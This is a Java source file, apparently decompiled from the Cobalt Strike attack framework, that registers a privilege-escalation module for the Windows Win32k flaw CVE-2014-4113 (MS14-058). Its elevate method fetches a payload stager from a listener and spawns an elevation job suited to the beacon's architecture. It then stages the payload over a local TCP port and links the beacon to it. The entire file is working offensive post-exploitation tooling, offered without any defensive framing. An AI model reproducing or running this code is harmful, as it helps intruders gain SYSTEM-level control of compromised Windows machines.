package beacon.exploits;

import aggressor.AggressorClient;
import aggressor.DataUtils;
import beacon.BeaconExploits;
import beacon.TaskBeacon;
import beacon.jobs.ElevateJob;
import common.BeaconEntry;
import common.CommonUtils;
import common.ListenerUtils;
import common.ScListener;

public class cve_2014_4113 implements BeaconExploits.Exploit {
    protected AggressorClient client;

    public cve_2014_4113(AggressorClient aggressorClient) {
        this.client = aggressorClient;
        DataUtils.getBeaconExploits(aggressorClient.getData()).register("ms14-058", "TrackPopupMenu Win32k NULL Pointer Dereference (CVE-2014-4113)", this);
    }

    public void elevate(String string1, String string2) {
        int i = CommonUtils.randomPort();
        ScListener scListener = ListenerUtils.getListener(this.client, string2);
        TaskBeacon taskBeacon = new TaskBeacon(this.client, new String[]{string1});
        byte[] arrby = scListener.getPayloadStagerLocal(i, "x86");
        BeaconEntry beaconEntry = DataUtils.getBeacon(this.client.getData(), string1);
        if (beaconEntry != null && beaconEntry.is64()) {
            (new ElevateJob(taskBeacon, string2, arrby)).spawn(string1, "x64");
        } else if (beaconEntry != null) {
            (new ElevateJob(taskBeacon, string2, arrby)).spawn(string1, "x86");
        } else {
            CommonUtils.print_error("Beacon " + string1 + " has no entry. Not issuing elevate task");
        }
        taskBeacon.StageTCP(string1, "127.0.0.1", i, "x86", scListener);
        taskBeacon.linkToPayloadLocal(scListener);
    }
}
